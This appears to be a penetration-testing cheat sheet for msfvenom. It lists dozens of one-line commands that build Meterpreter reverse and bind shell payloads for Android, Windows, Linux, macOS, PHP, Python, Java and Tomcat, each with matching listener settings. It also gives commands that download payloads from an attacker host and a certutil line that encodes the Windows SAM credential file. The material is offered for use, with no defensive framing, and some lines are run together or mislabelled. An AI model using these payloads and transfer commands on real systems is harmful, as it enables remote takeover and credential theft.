~/Tools Tips & Tricks/Msfvenom# █
#IP: 192.168.1.50
#PORT: 5050
Base64
cat FILE | base64 -w0
echo 'BASE64' | base64 -d > FILE
Base64 Alternative
base64 -w 0 $FILE_NAME | xclip -selection clipboard
* Linux
base64 data.txt > data.b64
base64 -d data.b64 > data.txt
* Windows
certutil -encode SAM sam.b64 && findstr /v /c:- tmp.b64 > data.b64
certutil -decode data.b64 data.txt
* macOS
base64 -i data.txt -o data.b64
base64 -D -i data.b64 -o data.txt
File Transfer Windows
powershell iwr http://192.168.1.50/ipayload.exe -outfile c:\ProgramData\ipayload.exe
certutil.exe -urlcache -split -f http://192.168.1.50/ipayload.exe
File Transfer Linux
wget http://192.168.1.50/ipayload
curl -O http://192.168.1.50/ipayload
fetch http://192.168.1.50/ipayload # on BSD
Nc Transfer
nc -nvlp 6666 > ipayload # Remote
nc TargetIP 6666 < ipayload # Local
Scp Transfer
# Copy a file:
scp /root/Payloads/ipayload username@IP
# Copy a directory:
scp -r /root/Payloads username@IP
Server
python -m SimpleHTTPServer 5050
python3 -m http.server 5050
Android Reverse TCP
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=5050 \
> 'android_meterpreter_reverse_tcp_5050.apk'use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jAndroid Reverse HTTP
msfvenom -p android/meterpreter_reverse_http \
LHOST=192.168.1.50 LPORT=5050 \
> '/android_meterpreter_reverse_http_5050.apk'use exploit/multi/handler
set PAYLOAD android/meterpreter_reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jAndroid Reverse HTTPS
msfvenom -p android/meterpreter/reverse_https \
LHOST=192.168.1.50 LPORT=5050 \
> 'android_meterpreter_reverse_https_5050.apk'use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASP TCP
msfvenom -p windows/meterpreter/reverse_tcp -f asp \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_asp_tcp_5050.asp'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASP HTTP
msfvenom -p windows/meterpreter/reverse_http -f asp \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_asp_http_5050.asp'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASP HTTPS
msfvenom -p windows/meterpreter/reverse_https -f asp \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_asp_https_5050.asp'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASP BIND
msfvenom -p windows/meterpreter/bind_tcp -f asp \
--platform windows -a x86 -e generic/none LPORT=5050 \
> 'windows_meterpreter_asp_bind_5050.asp'use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASPX TCP
msfvenom -p windows/meterpreter/reverse_tcp -f aspx \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_aspx_tcp_5050.aspx'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASPX HTTP
msfvenom -p windows/meterpreter/reverse_http -f aspx \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_aspx_http_5050.aspx'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASPX HTTPS
msfvenom -p windows/meterpreter/reverse_https -f aspx \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_aspx_https_5050.aspx'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows ASPX BIND
msfvenom -p windows/meterpreter/bind_tcp -f aspx \
--platform windows -a x86 -e generic/none LPORT=5050 \
> 'windows_meterpreter_aspx_bind_5050.aspx'use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jBash TCP
msfvenom -p cmd/unix/reverse_bash -f raw \
--platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
> 'bash_meterpreter_tcp_5050.sh'use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jBash HTTP
msfvenom -p cmd/unix/reverse_bash -f raw \
--platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
> 'bash_meterpreter_http_5050.sh'use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jBash HTTPS
msfvenom -p cmd/unix/reverse_bash -f raw \
--platform unix -e generic/none -a cmd LHOST=192.168.1.50 LPORT=5050 \
> 'bash_meterpreter_https_5050.sh'use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jJSP Java TCP
msfvenom -p java/meterpreter/reverse_tcp -f raw \
--platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
> 'java_meterpreter_tcp_5050.jsp'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jJSP Java HTTP
msfvenom -p java/meterpreter/reverse_http -f raw \
--platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
> 'java_meterpreter_http_5050.jsp'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jJSP Java HTTPS
msfvenom -p java/meterpreter/reverse_https -f raw \
--platform java -e generic/none -a java LHOST=192.168.1.50 LPORT=5050 \
> 'java_meterpreter_https_5050.jsp'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jJSP Java BIND
msfvenom -p java/meterpreter/bind_tcp -f raw \
--platform java -e generic/none -a java LPORT=5050 \
> 'java_meterpreter_bind_5050.jsp'use exploit/multi/handler
set PAYLOAD java/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jLinux TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf \
--platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'linux_meterpreter_tcp_5050.elf'use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jLinux HTTP
msfvenom -p linux/x86/meterpreter_reverse_http -f elf \
--platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'linux_meterpreter_http_5050.elf'use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter_reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jLinux HTTPS
msfvenom -p linux/x86/meterpreter_reverse_https -f elf \
--platform linux -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'linux_meterpreter_https_5050.elf'use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter_reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jLinux BIND
msfvenom -p linux/x86/meterpreter/bind_tcp -f elf \
--platform linux -a x86 -e generic/none LPORT=5050 \
> 'linux_meterpreter_bind_5050.elf'use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPerl Reverse TCP
msfvenom -p cmd/unix/reverse_perl -f pl \
--platform unix -a cmd -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'linux_meterpreter_perl_tcp_5050.pl'use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPerl Reverse BIND
msfvenom -p cmd/unix/bind_perl -f pl \
--platform unix -a cmd -e generic/none LPORT=5050 \
> 'linux_meterpreter_perl_bind_5050'use exploit/multi/handler
set PAYLOAD cmd/unix/bind_perl
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPHP Reverse TCP
msfvenom -p php/meterpreter/reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.1.50 LPORT=5050 \
> 'php_meterpreter_tcp_5050.php'use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPHP Reverse BIND
msfvenom -p php/meterpreter/bind_tcp -f raw \
--platform php -e generic/none -a php LPORT=5050 \
> 'php_meterpreter_bind_5050.php'use exploit/multi/handler
set PAYLOAD php/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPowerShell Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp -f ps1 \
--platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
> 'powershell_meterpreter_tcp_5050.ps1'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPowerShell Reverse HTTP
msfvenom -p windows/meterpreter/reverse_http -f ps1 \
--platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
> 'powershell_meterpreter_http_5050.ps1'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPowerShell Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https -f ps1 \
--platform windows -e generic/none -a x86 LHOST=192.168.1.50 LPORT=5050 \
> 'powershell_meterpreter_https_5050.ps1'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPowerShell Reverse BIND
msfvenom -p windows/meterpreter/bind_tcp -f ps1 \
--platform windows -e generic/none -a x86 LPORT=5050 \
> 'powershell_meterpreter_bind1_5050.ps1.ps1'use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPowerShell Reverse BIND
msfvenom -p windows/meterpreter_bind_tcp -f ps1 \
--platform windows -e generic/none -a x86 LPORT=5050 \
> 'powershell_meterpreter_bind2_5050.ps1'use exploit/multi/handler
set PAYLOAD windows/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPython Reverse TCP
msfvenom -p python/meterpreter/reverse_tcp -f raw \
--platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
> 'python_meterpreter_tcp_5050.py'use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPython Reverse HTTP
msfvenom -p python/meterpreter/reverse_http -f raw \
--platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
> 'python_meterpreter_http_5050.py'use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPython Reverse HTTPS
msfvenom -p python/meterpreter/reverse_https -f raw \
--platform python -e generic/none -a python LHOST=192.168.1.50 LPORT=5050 \
> 'python_meterpreter_https_5050.py'use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPython Reverse BIND
msfvenom -p python/meterpreter/bind_tcp -f raw \
--platform python -e generic/none -a python LPORT=5050 \
> 'python_meterpreter_bind1_5050.py'use exploit/multi/handler
set PAYLOAD python/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jPython Reverse BIND
msfvenom -p python/meterpreter_bind_tcp -f raw \
--platform python -e generic/none -a python LPORT=5050 \
> 'python_meterpreter_bind2_5050.py'use exploit/multi/handler
set PAYLOAD python/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jTomcat JAVA TCP
msfvenom -p java/meterpreter/reverse_tcp -f raw \
--platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'tomcat_meterpreter_tcp_5050.war'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jTomcat JAVA HTTP
msfvenom -p java/meterpreter/reverse_http -f raw \
--platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'tomcat_meterpreter_http_5050.war'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jTomcat JAVA HTTPS
msfvenom -p java/meterpreter/reverse_https -f raw \
--platform java -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'tomcat_meterpreter_https_5050.war'use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jTomcat JAVA BIND
msfvenom -p java/meterpreter/bind_tcp -f raw \
--platform java -a x86 -e generic/none LPORT=5050 \
> 'tomcat_meterpreter_bind_5050.war'use exploit/multi/handler
set PAYLOAD java/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_tcp_5050.exe'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows Reverse HTTP
msfvenom -p windows/meterpreter/reverse_http -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_http_5050.exe'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.50 LPORT=5050 \
> 'windows_meterpreter_https_5050.exe'use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows Reverse BIND
msfvenom -p windows/meterpreter/bind_tcp -f exe \
--platform windows -a x86 -e generic/none LPORT=5050 \
> 'windows_meterpreter_bind1_5050.exe'use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jWindows Reverse BIND
msfvenom -p windows/meterpreter_bind_tcp -f exe \
--platform windows -a x86 -e generic/none LPORT=5050 \
> 'windows_meterpreter_bind2_5050.exe'use exploit/multi/handler
set PAYLOAD windows/meterpreter_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jMac Reverse Shell TCP
msfvenom -p osx/x86/shell_reverse_tcp -f macho \
RHOST=192.168.1.50 LPORT=5050 \
> 'mac_reverse_tcp_5050.macho'use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -jMac Reverse Shell BIND
msfvenom -p osx/x86/shell_bind_tcp -f macho \
RHOST=192.168.1.50 LPORT=5050 \
> 'mac_reverse_bind_5050.macho'use exploit/multi/handler
set PAYLOAD osx/x86/shell_bind_tcp
set RHOST 192.168.1.50
set LPORT 5050
#set ExitOnSession false
#set EnableStageEncoding true
#set AutoRunScript 'post/windows/manage/migrate'
run -j